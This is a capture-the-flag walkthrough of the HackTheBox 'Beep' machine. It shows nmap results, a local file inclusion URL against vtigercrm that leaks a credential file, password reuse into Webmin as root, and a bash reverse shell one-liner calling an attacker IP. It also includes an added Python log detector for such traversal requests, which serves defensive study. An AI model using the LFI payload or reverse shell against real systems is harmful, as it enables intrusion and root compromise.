HackTheBox - Beep


Starting with a basic nmap scan:

nmap -sC -sV 10.10.10.7

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE APOP UIDL IMPLEMENTATION(Cyrus POP3 server v2) PIPELINING LOGIN-DELAY(0) RESP-CODES EXPIRE(NEVER) USER TOP STLS
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed X-NETSCAPE RENAME IMAP4 OK LIST-SUBSCRIBED LITERAL+ NO IDLE ATOMIC SORT CHILDREN URLAUTHA0001 CONDSTORE CATENATE ANNOTATEMORE THREAD=REFERENCES UNSELECT UIDPLUS IMAP4rev1 THREAD=ORDEREDSUBJECT SORT=MODSEQ ACL BINARY ID MULTIAPPEND STARTTLS MAILBOX-REFERRALS QUOTA RIGHTS=kxte LISTEXT NAMESPACE
443/tcp   open  ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2021-05-23T06:54:49+00:00; +1m54s from scanner time.
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 1m53s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 463.69 seconds

Port 80 is open (it redirects to HTTPS) and an application called Elastix is running on it.

Running dirbuster against http://10.10.10.7 enumerates the directories exposed by the web application.

There is also an HTTP server, Webmin (MiniServ 1.570), running on port 10000.

There are several public exploits for Elastix.

Using the local file inclusion in vtigercrm's graph.php, the URL http://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action returns the contents of /etc/amportal.conf.

That file contains the credentials username admin, password jEhdIekWmdjE. They let us log in, but there is nothing useful we can do from there.
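The LFI request above leaves a distinctive trace in the Apache access log: a deep "../" traversal, a null byte, and a sensitive file name in the query string. As an added example that is not part of the original writeup, here is a small Python detector that flags such requests; the sample log lines, the depth threshold and the list of sensitive files are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache combined-log lines (not captured from the target).
SAMPLE_LOG = """\
10.10.16.200 - - [23/May/2021:06:55:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 2731 "-" "Mozilla/5.0"
10.10.16.200 - - [23/May/2021:06:55:10 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts&action=index HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.16.200 - - [23/May/2021:06:55:15 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.16.200 - - [23/May/2021:06:55:20 +0000] "GET /vtigercrm/graph.php?current_language=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Fields of the common/combined log format we need: client IP, timestamp, request path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# Assumed list of files whose inclusion is always suspicious on this kind of host.
SENSITIVE_FILES = re.compile(r"/etc/(passwd|shadow|amportal\.conf)")

def lfi_indicators(raw_path: str) -> list[str]:
    """Return the LFI indicators found in a request path (decoded twice to catch double encoding)."""
    decoded = unquote(unquote(raw_path))
    found = []
    if "\x00" in decoded:                      # %00 truncation of an appended extension
        found.append("null-byte")
    depth = decoded.count("../") + decoded.count("..\\")
    if depth >= 2:                             # assumed threshold: two or more parent hops
        found.append(f"traversal-depth={depth}")
    if SENSITIVE_FILES.search(decoded):
        found.append("sensitive-file")
    return found

def scan_log(text: str) -> list[dict]:
    """Parse access-log lines and return one alert per request carrying LFI indicators."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ind = lfi_indicators(m["path"])
        if ind:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                           "status": int(m["status"]), "indicators": ind})
    return alerts

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["ts"], a["ip"], a["status"], ", ".join(a["indicators"]), a["path"])
```

A 200 status on a flagged request, as in the first sample line, is the case worth escalating, since it means the file was actually served.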

Trying the same password against Webmin on http://10.10.10.7:10000, with username root and password jEhdIekWmdjE, also works.

Under the 'Others' menu there is a Command Shell module, through which we can run arbitrary commands on the system as root.

Running bash -i >& /dev/tcp/10.10.16.200/1222 0>&1 from that shell gives us a reverse shell as the root user.

From the root shell we can read both the user.txt and root.txt flags.